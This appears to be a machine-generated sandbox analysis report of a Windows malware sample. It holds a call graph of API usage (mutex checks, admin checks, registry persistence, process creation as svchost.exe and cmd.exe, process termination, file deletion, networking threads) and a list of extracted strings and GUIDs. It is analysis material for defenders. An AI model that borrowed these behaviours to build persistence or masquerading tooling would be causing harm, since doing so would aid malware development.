RegCloseKey 18702->18704 18705 7d26f8 18703->18705 18706 7d26c7 RegOpenKeyW 18703->18706 18704->18703 18705->17628 18706->18705 18707 7d26df RegDeleteValueW RegCloseKey 18706->18707 18707->18705 19130 7e3520 18708->19130 18711 7cb8a4 _memset 18713 7cb8c0 GetWindowsDirectoryW 18711->18713 18712 7c110e 18712->17632 18712->17633 18713->18712 18714 7cb8dd _memset 18713->18714 18715 7cb8f9 GetSystemDirectoryW 18714->18715 18715->18712 18716 7cb916 _memset 18715->18716 18717 7e359a __snwprintf 102 API calls 18716->18717 18718 7cb952 _memset 18717->18718 18719 7e359a __snwprintf 102 API calls 18718->18719 18720 7cb991 _memset 18719->18720 18721 7e359a __snwprintf 102 API calls 18720->18721 18722 7cb9d0 StrCmpIW 18721->18722 18722->18712 18723 7cb9eb StrCmpIW 18722->18723 18723->18712 18724 7cba03 StrCmpIW 18723->18724 18724->18712 18726 7dbb68 18725->18726 18727 7dbb72 GetModuleFileNameW 18725->18727 19254 7c21e0 18726->19254 18727->18726 18728 7dbb91 18727->18728 18732 7dbbab 18728->18732 18733 7dbbb0 OpenMutexW 18728->18733 18735 7c1191 RtlExitUserThread 18732->18735 18733->18726 18736 7dbbe5 18733->18736 18734 7dbe60 19268 7c5060 18734->19268 18735->17632 19132 7c2160 18736->19132 18746 7dbe7b 19277 7d6be0 18746->19277 18747 7dbe73 ExitProcess 18752 7dbe89 CloseHandle 18753 7dbe95 18752->18753 18754 7dbe9b CloseHandle 18753->18754 18755 7dbea5 18753->18755 18754->18755 18757 7dbecc 18755->18757 18758 7dbebf CloseHandle 18755->18758 18759 7dbedc 18757->18759 18760 7dbed2 LocalFree 18757->18760 18758->18757 18759->18735 18762 7dbee5 ExitProcess 18759->18762 18760->18759 18770 7dbc9f 18772 7dc4b0 4 API calls 18770->18772 18771 7dbc82 CreateMutexW 18771->18732 18771->18770 18773 7dbcb0 18772->18773 19208 7cbc80 LocalAlloc 18773->19208 18776 7dbce1 18778 7dc4b0 4 API calls 18776->18778 18777 7dbcc4 CreateMutexW 18777->18732 18777->18776 18779 7dbcf2 18778->18779 19221 7cbd80 LocalAlloc 18779->19221 18800 7d00e5 lstrcmpiW 18799->18800 18801 7c119e 18799->18801 18802 7d00ff 
IsUserAnAdmin 18800->18802 18803 7d01c6 lstrcmpiW 18800->18803 18801->17641 18801->17642 18806 7d016c ExitProcess 18802->18806 18807 7d0114 OpenEventW 18802->18807 18804 7d02a5 lstrcmpiW 18803->18804 18805 7d01e0 OpenMutexW 18803->18805 18812 7d02bf OpenMutexW 18804->18812 18813 7d037e lstrcmpiW 18804->18813 18808 7d01fb WaitForSingleObject CloseHandle 18805->18808 18809 7d0214 OpenMutexW 18805->18809 18810 7d0136 SetEvent 18807->18810 18811 7d0162 ExitProcess 18807->18811 18808->18809 18814 7d022f WaitForSingleObject CloseHandle 18809->18814 18815 7d0248 18809->18815 18817 7d0144 CloseHandle ExitProcess 18810->18817 18818 7d0156 CloseHandle 18810->18818 18819 7d02da WaitForSingleObject CloseHandle 18812->18819 18820 7d02f3 OpenMutexW 18812->18820 18813->18801 18816 7d0394 18813->18816 18814->18815 18821 7d028b Sleep 18815->18821 18822 7d0251 OpenMutexW 18815->18822 18823 7d039d OpenMutexW 18816->18823 18824 7d03d7 Sleep 18816->18824 18825 7d016a 18818->18825 18819->18820 18826 7d030e WaitForSingleObject CloseHandle 18820->18826 18827 7d0327 18820->18827 18821->18801 18828 7d0287 18822->18828 18829 7d0273 CloseHandle Sleep 18822->18829 18830 7d03bf CloseHandle Sleep 18823->18830 18831 7d03d3 18823->18831 18824->18801 18836 7d017d OpenMutexW 18825->18836 18837 7d01b3 18825->18837 18826->18827 18832 7d036a Sleep 18827->18832 18833 7d0330 OpenMutexW 18827->18833 18828->18821 18829->18815 18830->18816 18831->18824 18832->18801 18834 7d0366 18833->18834 18835 7d0352 CloseHandle Sleep 18833->18835 18834->18832 18835->18827 18836->18837 18838 7d019f CloseHandle Sleep 18836->18838 18837->18801 18838->18825 18840 7c1285 18839->18840 18841 7dc0c9 RtlGetVersion 18839->18841 18840->17649 18842 7dc3a0 AllocateAndInitializeSid 18840->18842 18841->18840 18843 7c128f 18842->18843 18844 7dc3ea CheckTokenMembership 18842->18844 18843->17649 18847 7d6410 LocalAlloc 18843->18847 18845 7dc3fe 18844->18845 18846 7dc405 FreeSid 18844->18846 18845->18846 18846->18843 18848 7d6452 
18847->18848 18852 7d6850 18847->18852 18849 7d684a 18848->18849 18850 7d6486 _wcscat 18848->18850 18851 7d6858 LocalFree 18849->18851 18849->18852 18853 7d64bf 18850->18853 18854 7d650e 18850->18854 18851->18852 18852->17676 18855 7e359a __snwprintf 102 API calls 18853->18855 18856 7d65cc 18854->18856 18857 7d6527 LocalAlloc 18854->18857 18880 7d64e9 _wcscat 18855->18880 18858 7d665e 18856->18858 18859 7d65e1 SHGetKnownFolderPath 18856->18859 18860 7d65c7 18857->18860 18861 7d6547 GetWindowsDirectoryW 18857->18861 18863 7d66f0 18858->18863 18864 7d6673 SHGetKnownFolderPath 18858->18864 18862 7d65fb 18859->18862 18859->18880 18860->18880 18865 7d655d 18861->18865 18866 7d65ba LocalFree 18861->18866 18869 7e359a __snwprintf 102 API calls 18862->18869 18867 7d6709 LocalAlloc 18863->18867 18868 7d67b8 18863->18868 18870 7d668d 18864->18870 18864->18880 18871 7e359a __snwprintf 102 API calls 18865->18871 18866->18860 18867->18860 18872 7d6729 GetTempPathW 18867->18872 18876 7d67cd SHGetKnownFolderPath 18868->18876 18868->18880 18873 7d662c CoTaskMemFree 18869->18873 18874 7e359a __snwprintf 102 API calls 18870->18874 18875 7d659a _wcscat 18871->18875 18878 7d673f 18872->18878 18879 7d67a6 LocalFree 18872->18879 18873->18880 18881 7d66be CoTaskMemFree 18874->18881 18875->18866 18877 7d67e7 18876->18877 18876->18880 18882 7e359a __snwprintf 102 API calls 18877->18882 18884 7e359a __snwprintf 102 API calls 18878->18884 18879->18860 18880->17676 18881->18880 18883 7d6818 CoTaskMemFree 18882->18883 18883->18880 18885 7d6786 _wcscat 18884->18885 18885->18879 18887 7c12c3 LocalFree 18886->18887 18888 7d6893 GetSystemDirectoryW 18886->18888 18887->17649 18889 7d68aa LocalAlloc 18888->18889 18890 7d6987 LocalFree 18888->18890 18889->18890 18891 7d68c4 18889->18891 18890->18887 18892 7d79f0 5 API calls 18891->18892 18893 7d68e6 18892->18893 18894 7e359a __snwprintf 102 API calls 18893->18894 18895 7d6902 _memset 18894->18895 18896 7d6915 CreateProcessW 18895->18896 18897 7d697d 
LocalFree 18896->18897 18898 7d6962 LocalFree LocalFree 18896->18898 18897->18890 18898->18887 18900 7c133e CreateEventW 18899->18900 18901 7dc4f0 GetSecurityDescriptorSacl 18899->18901 18900->17666 18900->17667 18902 7dc50a SetNamedSecurityInfoW 18901->18902 18903 7dc525 LocalFree 18901->18903 18902->18903 18903->18900 18905 7c1563 18904->18905 18906 7cfa51 GetModuleFileNameW 18904->18906 18905->17695 18905->17696 18907 7cfa6f LoadLibraryW 18906->18907 18909 7cfa6b 18906->18909 18908 7cfa8d GetModuleFileNameW 18907->18908 18907->18909 18908->18909 18909->18905 18911 7d760c CreateMutexW 18910->18911 18912 7c1574 18910->18912 18911->18912 18913 7d7629 18911->18913 18912->17702 18912->17703 18913->18912 18915 7e359a __snwprintf 102 API calls 18914->18915 18916 7d4204 RegCreateKeyExW 18915->18916 18917 7d4234 RegCloseKey 18916->18917 18923 7c1585 18916->18923 18918 7d424b _memset 18917->18918 21015 7cb4a0 18918->21015 18921 7d425e GetSystemTime SystemTimeToFileTime 21019 7cb510 18921->21019 18923->17709 18923->17710 18925 7e3520 _memset 18924->18925 18926 7d42d9 GetModuleFileNameW 18925->18926 18927 7d42f8 18926->18927 18928 7c1596 18926->18928 21026 7dc570 CreateFileW 18927->21026 18928->17717 18928->17718 18931 7e359a __snwprintf 102 API calls 18932 7d433c RegOpenKeyExW 18931->18932 18933 7d43b9 LocalFree 18932->18933 18934 7d4363 RegSetValueExW 18932->18934 18933->18928 18935 7d43ac RegCloseKey 18934->18935 18936 7d438b RegCloseKey LocalFree 18934->18936 18935->18933 18936->18928 18938 7e3520 _memset 18937->18938 18939 7d43f5 GetModuleFileNameW 18938->18939 18940 7c15a7 18939->18940 18941 7d4414 18939->18941 18940->17726 18940->17727 18942 7e359a __snwprintf 102 API calls 18941->18942 18943 7d442f RegOpenKeyExW 18942->18943 18943->18940 18944 7d4456 lstrlenW RegSetValueExW 18943->18944 18945 7d449d RegCloseKey 18944->18945 18946 7d4489 RegCloseKey 18944->18946 18945->18940 18946->18940 18948 7c15df 18947->18948 18949 7cff31 LocalAlloc 18947->18949 18948->17738 
18948->17739 18950 7cff4b wnsprintfW 18949->18950 18951 7cfff5 CoTaskMemFree 18949->18951 18952 7cffeb LocalFree 18950->18952 18953 7cff74 18950->18953 18951->18948 18952->18951 19023 7c1240 19022->19023 19024 7c1cb5 _memset 19022->19024 19023->17691 19023->17692 19025 7c1cd1 GetWindowsDirectoryW 19024->19025 19026 7c1cee _memset 19025->19026 19027 7c1fdf 19025->19027 19029 7dc1e0 3 API calls 19026->19029 19027->19023 19028 7c1fe5 CloseHandle 19027->19028 19028->19023 19030 7c1d12 19029->19030 19031 7c1d39 19030->19031 19032 7c1d17 19030->19032 19034 7e359a __snwprintf 102 API calls 19031->19034 19033 7e359a __snwprintf 102 API calls 19032->19033 19035 7c1d34 _memset 19033->19035 19034->19035 19036 7c1d75 GetCurrentDirectoryW 19035->19036 19036->19027 19037 7c1d92 LocalAlloc 19036->19037 19037->19027 19038 7c1dbc 14 API calls 19037->19038 19039 7ca1b0 26 API calls 19038->19039 19040 7c1f67 19039->19040 19041 7c1f6f WaitForSingleObject 19040->19041 19042 7c1fc9 19040->19042 19043 7c1f90 TerminateProcess CloseHandle CloseHandle 19041->19043 19042->19027 19044 7c1fd2 LocalFree 19042->19044 19043->19042 19044->19027 21073 7cfcf0 19046->21073 19049 7cfe82 lstrlenW lstrlenW LocalAlloc 19050 7cff00 CoTaskMemFree 19049->19050 19051 7cfec1 19049->19051 19052 7c13c5 19050->19052 19053 7e359a __snwprintf 102 API calls 19051->19053 19052->17699 19052->17700 19054 7cfedf lstrlenW CoTaskMemFree 19053->19054 19054->19052 19056 7cfe20 109 API calls 19055->19056 19057 7cfaed 19056->19057 19131 7cb885 GetModuleFileNameW 19130->19131 19131->18711 19131->18712 19133 7c216c 19132->19133 19134 7c2173 CreateEventW 19132->19134 19133->18726 19137 7c41f0 19133->19137 19134->19133 19135 7c218f CreateThread 19134->19135 19135->19133 19136 7c21b9 CloseHandle 19135->19136 19308 7c25a0 19135->19308 19136->19133 19138 7c41fc 19137->19138 19139 7c420f CreateEventW 19137->19139 19138->19139 19140 7c4205 19138->19140 19139->19140 19141 7c422b CreateEventW 19139->19141 19140->18726 19145 7d7640 
19140->19145 19142 7c4287 CloseHandle 19141->19142 19143 7c4247 CreateThread 19141->19143 19142->19140 19143->19140 19144 7c4271 CloseHandle 19143->19144 19422 7c4320 19143->19422 19144->19142 19146 7d764c 19145->19146 19147 7d7653 CreateThread 19145->19147 19146->18726 19148 7c6850 GetModuleHandleW GetProcAddress GetProcAddress 19146->19148 19147->19146 19709 7d76f0 GetModuleHandleW 19147->19709 19149 7c6890 19148->19149 19149->18726 19150 7d69a0 lstrlenW 19149->19150 19151 7d69b8 CreateEventW 19150->19151 19156 7d69f7 19150->19156 19153 7d69d4 CreateThread 19151->19153 19151->19156 19152 7d6adf 19159 7d6aed 19152->19159 19799 7d2560 19152->19799 19155 7d69fb LocalFree 19153->19155 19153->19156 20255 7cba30 19153->20255 19154 7dc3a0 3 API calls 19160 7d6a23 19154->19160 19155->19156 19156->19152 19156->19154 19158 7d6afb 19162 7d6b09 19158->19162 19847 7dac50 CreateThread 19158->19847 19159->19158 19812 7d22d0 LocalAlloc 19159->19812 19160->19152 19163 7cfe20 109 API calls 19160->19163 19849 7c8cd0 19162->19849 19174 7d6a51 _memset 19163->19174 19167 7d6b1c CreateEventW 19168 7d6b6a WSAStartup 19167->19168 19169 7d6b38 CreateThread 19167->19169 19170 7d6b7d 19168->19170 19171 7d6bc3 19168->19171 19175 7d6b5d CloseHandle 19169->19175 19176 7d6b5b 19169->19176 20271 7cf100 19169->20271 19172 7d6b86 CreateThread 19170->19172 19173 7d6ba0 CreateThread 19170->19173 19171->18726 19182 7c5010 19171->19182 19172->19173 20331 7db630 CreateEventW 19172->20331 19173->19171 19177 7d6bca WSACleanup 19173->19177 20357 7e1030 OpenEventW 19173->20357 19174->19152 19178 7e359a __snwprintf 102 API calls 19174->19178 19175->19168 19176->19168 19177->19171 19179 7d6aa4 19178->19179 19720 7ca680 19179->19720 19183 7c501c 19182->19183 19184 7c5023 CreateThread 19182->19184 19183->18726 19185 7c45b0 19183->19185 19184->19183 20775 7c5140 LocalAlloc 19184->20775 19186 7c45c3 19185->19186 19194 7c45bc 19185->19194 20946 7c4700 19186->20946 19189 7c460d CreateThread 19189->19194 20958 
7c4800 19189->20958 19192 7c4700 103 API calls 19193 7c4602 19192->19193 19193->19189 19193->19194 19194->18726 19195 7cbb80 LocalAlloc 19194->19195 19196 7cbc6b 19195->19196 19197 7cbba0 LocalAlloc 19195->19197 19196->18770 19196->18771 19198 7cbbba LocalAlloc 19197->19198 19199 7cbc61 LocalFree 19197->19199 19200 7cbbd4 GetModuleFileNameW 19198->19200 19201 7cbc57 LocalFree 19198->19201 19199->19196 19202 7cbc4d LocalFree 19200->19202 19203 7cbbe9 GetWindowsDirectoryW 19200->19203 19201->19199 19202->19201 19203->19202 19204 7cbbfc 19203->19204 19205 7e359a __snwprintf 102 API calls 19204->19205 19206 7cbc13 lstrcmpiW 19205->19206 19206->19202 19207 7cbc28 LocalFree LocalFree LocalFree 19206->19207 19207->19196 19209 7cbd6b 19208->19209 19210 7cbca0 LocalAlloc 19208->19210 19209->18776 19209->18777 19211 7cbcba LocalAlloc 19210->19211 19212 7cbd61 LocalFree 19210->19212 19213 7cbcd4 GetModuleFileNameW 19211->19213 19214 7cbd57 LocalFree 19211->19214 19212->19209 19215 7cbd4d LocalFree 19213->19215 19216 7cbce9 GetSystemDirectoryW 19213->19216 19214->19212 19215->19214 19216->19215 19217 7cbcfc 19216->19217 19218 7e359a __snwprintf 102 API calls 19217->19218 19222 7cbe6b 19221->19222 19223 7cbda0 LocalAlloc 19221->19223 19255 7c21ec SetEvent 19254->19255 19256 7c21f8 19254->19256 19255->19256 19257 7c2227 19256->19257 19258 7c2201 WaitForSingleObject CloseHandle 19256->19258 19259 7c2246 19257->19259 19260 7c2230 CloseHandle 19257->19260 19258->19257 19261 7c42b0 19259->19261 19260->19259 19262 7c42bc SetEvent 19261->19262 19263 7c42c8 19261->19263 19262->19263 19264 7c42f7 19263->19264 19265 7c42d1 WaitForSingleObject CloseHandle 19263->19265 19266 7c4316 19264->19266 19267 7c4300 CloseHandle 19264->19267 19265->19264 19266->18734 19267->19266 19269 7c506c WaitForSingleObject 19268->19269 19270 7c507a 19268->19270 19269->19270 19271 7d7690 19270->19271 19272 7d769c 19271->19272 19273 7d76a3 19271->19273 19272->18746 19272->18747 19274 7d76ac PostMessageW 
19273->19274 19275 7d76be 19273->19275 19274->19275 19275->19272 19276 7d76c7 WaitForSingleObject CloseHandle 19275->19276 19276->19272 19278 7d6bf6 SetEvent 19277->19278 19279 7d6c02 19277->19279 19278->19279 19280 7d6c0b WaitForSingleObject 19279->19280 19281 7d6c1a 19279->19281 19280->19281 19282 7d6c30 19281->19282 19283 7d6c23 CloseHandle 19281->19283 19284 7d6c39 SetEvent 19282->19284 19285 7d6c45 19282->19285 19283->19282 19284->19285 19286 7d6c5d 19285->19286 19287 7d6c4e WaitForSingleObject 19285->19287 19288 7d6c66 CloseHandle 19286->19288 19289 7d6c73 19286->19289 19287->19286 19288->19289 19290 7d6c7c CloseHandle 19289->19290 19291 7d6c88 19289->19291 19290->19291 19292 7d6c9e 19291->19292 19293 7d6c91 SetEvent 19291->19293 19294 7d6ca7 WaitForSingleObject 19292->19294 19295 7d6cb6 19292->19295 19293->19292 19294->19295 19296 7d6cbf CloseHandle 19295->19296 19297 7d6ccb 19295->19297 19296->19297 19298 7d6cd4 SetEvent 19297->19298 19299 7d6ce1 19297->19299 19298->19299 19300 7d6cf9 19299->19300 19301 7d6cea WaitForSingleObject 19299->19301 19302 7d6d0e 19300->19302 19303 7d6d02 CloseHandle 19300->19303 19301->19300 19304 7d6d24 19302->19304 19305 7d6d17 CloseHandle 19302->19305 19303->19302 21010 7dac90 19304->21010 19305->19304 19309 7c25af 19308->19309 19311 7c25cd 19308->19311 19310 7c25bd 19309->19310 19318 7c2250 19309->19318 19317 7c25cb 19310->19317 19335 7c2490 19310->19335 19313 7c2250 138 API calls 19311->19313 19314 7c25f2 WaitForMultipleObjects 19311->19314 19316 7c2490 7 API calls 19311->19316 19311->19317 19313->19311 19314->19311 19314->19317 19316->19314 19319 7c2278 19318->19319 19320 7c22c3 19319->19320 19345 7d79f0 19319->19345 19354 7c2640 19320->19354 19323 7c22ea _memset 19324 7c2483 19323->19324 19325 7c2319 GetSystemDirectoryW 19323->19325 19324->19310 19326 7c246d 19325->19326 19327 7c2336 _memset 19325->19327 19326->19324 19328 7c2476 LocalFree 19326->19328 19329 7c2350 LocalAlloc 19327->19329 19328->19324 19329->19326 19330 
7c23b7 19329->19330 19331 7e359a __snwprintf 102 API calls 19330->19331 19332 7c23d6 CreateProcessW 19331->19332 19333 7c240c WaitForSingleObject CloseHandle CloseHandle LocalFree LocalFree 19332->19333 19334 7c2460 LocalFree 19332->19334 19333->19324 19334->19326 19336 7c24aa 19335->19336 19337 7c2597 19336->19337 19338 7c24b7 Process32FirstW 19336->19338 19337->19317 19339 7c258d CloseHandle 19338->19339 19344 7c24da 19338->19344 19339->19337 19340 7c2574 Process32NextW 19340->19339 19340->19344 19341 7c2503 lstrcmpiW 19342 7c2524 OpenProcess 19341->19342 19341->19344 19343 7c2551 TerminateProcess CloseHandle 19342->19343 19342->19344 19343->19344 19344->19340 19344->19341 19346 7d7a08 19345->19346 19347 7d7ab2 19345->19347 19348 7d7a0e lstrlenW 19346->19348 19349 7d7a5a lstrlenW LocalAlloc 19346->19349 19350 7d7b11 LocalAlloc 19347->19350 19353 7d7a2a _memset _memmove 19347->19353 19348->19353 19351 7d7a8e _memmove 19349->19351 19352 7d7a95 lstrcpyW 19349->19352 19350->19351 19351->19353 19352->19353 19353->19319 19373 7da210 19354->19373 19356 7c2666 LocalAlloc 19357 7c2905 19356->19357 19358 7c26a7 19356->19358 19357->19323 19359 7c28ee 19358->19359 19360 7c26c5 Process32FirstW 19358->19360 19359->19357 19361 7c28f4 LocalFree 19359->19361 19362 7c28e4 CloseHandle 19360->19362 19366 7c26e8 _memset codecvt 19360->19366 19361->19357 19362->19359 19364 7c28cb Process32NextW 19364->19362 19364->19366 19365 7c2775 lstrcmpiW 19365->19366 19366->19364 19366->19365 19367 7c27b6 lstrcpyW 19366->19367 19368 7c285a StrCatW StrCatW 19366->19368 19369 7c280a lstrcpyW 19366->19369 19372 7c2a80 77 API calls 19366->19372 19375 7c3740 19366->19375 19367->19366 19371 7c2940 77 API calls 19368->19371 19379 7c2940 19369->19379 19371->19366 19372->19366 19374 7da224 19373->19374 19374->19356 19376 7c3750 19375->19376 19383 7c39e0 19376->19383 19378 7c3766 19378->19366 19380 7c2969 construct codecvt 19379->19380 19394 7c2bb0 19380->19394 19386 7c39e5 19383->19386 19384 7c3a0d 
19384->19378 19386->19384 19387 7c3cb0 19386->19387 19390 7c3db0 19387->19390 19391 7c3dc0 19390->19391 19392 7c3e00 67 API calls 19391->19392 19393 7c3cbf 19392->19393 19393->19386 19395 7c2bc0 19394->19395 19398 7c2e70 19395->19398 19397 7c2990 19397->19366 19399 7c2e83 19398->19399 19400 7c2eac 19399->19400 19401 7c2e8a codecvt 19399->19401 19416 7c3110 19400->19416 19405 7c2ef0 19401->19405 19404 7c2eaa codecvt 19404->19397 19406 7c2f01 allocator 19405->19406 19407 7c31e0 allocator 67 API calls 19406->19407 19408 7c2f0e allocator 19406->19408 19407->19408 19409 7c2f57 19408->19409 19410 7c2f32 19408->19410 19412 7c3110 allocator 77 API calls 19409->19412 19411 7c2fd0 allocator 67 API calls 19410->19411 19413 7c2f47 19411->19413 19415 7c2f55 codecvt 19412->19415 19414 7c2fd0 allocator 67 API calls 19413->19414 19414->19415 19415->19404 19417 7c3121 allocator 19416->19417 19418 7c312e 19417->19418 19419 7c3680 allocator 67 API calls 19417->19419 19420 7c34c0 allocator 77 API calls 19418->19420 19421 7c314c codecvt 19418->19421 19419->19418 19420->19421 19421->19404 19423 7c4326 WaitForSingleObject 19422->19423 19424 7c4406 19423->19424 19429 7c4342 19423->19429 19427 7c43f4 ResetEvent 19427->19429 19428 7c43d2 SetEvent 19428->19429 19429->19423 19429->19427 19429->19428 19430 7c437a OpenEventW 19429->19430 19434 7c4410 19429->19434 19443 7cb6d0 19429->19443 19468 7d58b0 19429->19468 19525 7c44e0 19429->19525 19430->19429 19431 7c4392 SetEvent CloseHandle 19430->19431 19431->19424 19435 7c442a 19434->19435 19436 7c4437 Process32FirstW 19435->19436 19437 7c44d2 19435->19437 19438 7c44c8 CloseHandle 19436->19438 19442 7c4456 19436->19442 19437->19429 19438->19437 19439 7c447f StrCmpIW 19441 7c44a0 CloseHandle 19439->19441 19439->19442 19440 7c44b3 Process32NextW 19440->19438 19440->19442 19441->19437 19442->19439 19442->19440 19444 7cfe20 109 API calls 19443->19444 19445 7cb6eb 19444->19445 19446 7cb6fb CreateDirectoryW 19445->19446 19447 7cb857 19445->19447 19448 
7cb70c GetLastError 19446->19448 19449 7cb71d LocalAlloc 19446->19449 19447->19429 19448->19449 19450 7cb847 19448->19450 19449->19450 19451 7cb737 19449->19451 19450->19447 19452 7cb84d LocalFree 19450->19452 19453 7e359a __snwprintf 102 API calls 19451->19453 19452->19447 19454 7cb753 CreateFileW GetLastError 19453->19454 19455 7cb78b 19454->19455 19456 7cb837 19455->19456 19457 7cb79b 19455->19457 19534 7ca0f0 19455->19534 19456->19450 19460 7cb83d LocalFree 19456->19460 19458 7cb7f8 LocalFree LocalFree 19457->19458 19458->19447 19460->19450 19462 7cb81d 19466 7cb82d DeleteFileW 19462->19466 19467 7cb823 CloseHandle 19462->19467 19463 7cb7c7 WriteFile 19464 7cb7e7 CloseHandle 19463->19464 19465 7cb813 LocalFree 19463->19465 19464->19458 19465->19462 19466->19456 19467->19466 19469 7d58bd __write_nolock 19468->19469 19470 7d79f0 5 API calls 19469->19470 19473 7d5955 19469->19473 19470->19469 19471 7d5a6e 19474 7d5a7f wnsprintfW RegDeleteKeyExW 19471->19474 19473->19471 19541 7d7d60 19473->19541 19549 7df3b0 19474->19549 19477 7df3b0 19478 7d5b17 wnsprintfW RegDeleteKeyExW 19477->19478 19479 7df3b0 19478->19479 19480 7d5b63 wnsprintfW RegDeleteKeyExW 19479->19480 19481 7d2680 6 API calls 19480->19481 19482 7d5ba3 19481->19482 19551 7d3160 19482->19551 19486 7d5bad 19587 7d2e00 SHGetKnownFolderPath 19486->19587 19490 7d5bbc 19628 7d0010 SHGetKnownFolderPath 19490->19628 19526 7c44fa 19525->19526 19527 7c4507 Process32FirstW 19526->19527 19528 7c45a2 19526->19528 19529 7c4598 CloseHandle 19527->19529 19533 7c4526 19527->19533 19528->19429 19529->19528 19530 7c454f StrCmpIW 19532 7c4570 CloseHandle 19530->19532 19530->19533 19531 7c4583 Process32NextW 19531->19529 19531->19533 19532->19528 19533->19530 19533->19531 19535 7e359a __snwprintf 102 API calls 19534->19535 19536 7ca118 RegGetValueW 19535->19536 19537 7ca152 LocalAlloc 19536->19537 19539 7ca193 19536->19539 19538 7ca167 RegGetValueW 19537->19538 19537->19539 19538->19539 19540 7ca1a0 LocalFree 19538->19540 
19539->19462 19539->19463 19540->19539 19542 7d7d78 19541->19542 19543 7d7e20 19541->19543 19544 7d7d7e lstrlenA 19542->19544 19545 7d7dc9 lstrlenA LocalAlloc 19542->19545 19547 7d7e78 LocalAlloc 19543->19547 19548 7d7d9a _memset _memmove 19543->19548 19544->19548 19546 7d7e03 lstrcpyA 19545->19546 19545->19548 19546->19548 19547->19548 19548->19473 19550 7d5acb wnsprintfW RegDeleteKeyExW 19549->19550 19550->19477 19552 7d329d 19551->19552 19553 7d3173 LocalAlloc 19551->19553 19569 7d2f20 OpenEventW 19552->19569 19554 7d31dd SHGetKnownFolderPath 19553->19554 19555 7d3189 SHGetKnownFolderPath 19553->19555 19554->19552 19556 7d31f8 LocalAlloc 19554->19556 19557 7d31a0 19555->19557 19558 7d31d3 LocalFree 19555->19558 19559 7d3293 CoTaskMemFree 19556->19559 19560 7d3212 19556->19560 19561 7e359a __snwprintf 102 API calls 19557->19561 19558->19554 19559->19552 19562 7e359a __snwprintf 102 API calls 19560->19562 19563 7d31bc DeleteFileW CoTaskMemFree 19561->19563 19564 7d322e LocalAlloc 19562->19564 19563->19558 19565 7d3289 LocalFree 19564->19565 19566 7d3247 19564->19566 19565->19559 19567 7e359a __snwprintf 102 API calls 19566->19567 19568 7d3268 DeleteFileW RemoveDirectoryW LocalFree 19567->19568 19568->19565 19570 7d2f6e OpenMutexW 19569->19570 19571 7d2f54 SetEvent CloseHandle 19569->19571 19572 7d2f99 WaitForSingleObject CloseHandle 19570->19572 19573 7d2fb5 SHGetKnownFolderPath 19570->19573 19571->19570 19572->19573 19574 7d3104 19573->19574 19575 7d2fd3 LocalAlloc 19573->19575 19578 7d3115 wnsprintfW RegDeleteKeyExW 19574->19578 19576 7d30f7 CoTaskMemFree 19575->19576 19577 7d2ff3 19575->19577 19576->19574 19579 7d30ea LocalFree 19577->19579 19580 7e359a __snwprintf 102 API calls 19577->19580 19578->19486 19579->19576 19581 7d3024 lstrlenW 19580->19581 19583 7d306f _memset 19581->19583 19582 7d309e GetFileAttributesW 19582->19579 19582->19583 19583->19582 19584 7d30b9 19583->19584 19585 7d30bb SHFileOperationW 19583->19585 19584->19579 19585->19584 19586 7d30ce 
                                                                            APIs
                                                                              • Part of subcall function 007D8110: LoadLibraryW.KERNEL32(NTDLL.DLL), ref: 007D811E
                                                                            • ExitProcess.KERNEL32 ref: 007C103F
                                                                            • _memset.LIBCMT ref: 007C105C
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 007C1072
                                                                            • ExitProcess.KERNEL32 ref: 007C107E
                                                                            Strings
                                                                            • {650443EC-0EFE-4819-82E8-5F93F6D2E6A5}, xrefs: 007C10D1
                                                                            • {F064C698-006D-4351-BA2C-625A53964F8D}, xrefs: 007C149F
                                                                            • %s\svchost.exe, xrefs: 007C1744
                                                                            • {04D458D6-7C6C-445F-AEAD-313D698F1F0A}, xrefs: 007C19DF
                                                                            • {36B5A614-B027-4841-8B7A-585CE588BF9D}, xrefs: 007C1149, 007C1964
                                                                            • {F95B00D0-572A-45B1-BD9B-5DB7078A4AC4}, xrefs: 007C1A5D
                                                                            • {EF67FEC6-3B78-4CEC-ADF5-E05B5411BD4E}, xrefs: 007C12D3
                                                                            • {C3397568-8840-4085-8F6E-BC07C085BB3B}, xrefs: 007C130E, 007C1334
                                                                            • {9A30B3AA-5D5B-4418-94BC-EA9A5585D123}, xrefs: 007C14D1
                                                                            • %s\cmd.exe, xrefs: 007C1788
                                                                            • {54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}, xrefs: 007C1117, 007C1341, 007C1368
                                                                            • {BBE56B4F-CBD4-4E5B-AF23-B7BA3CDDF0CA}, xrefs: 007C14B8
                                                                            • {CCEFB138-B038-41E1-AC53-171A4E58AB6A}, xrefs: 007C11B4, 007C11EA
                                                                            • {C55632B1-A307-4128-9468-89792C176C2F}, xrefs: 007C1ADC
                                                                            • %s\explorer.exe, xrefs: 007C1703
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExitProcess$FileLibraryLoadModuleName_memset
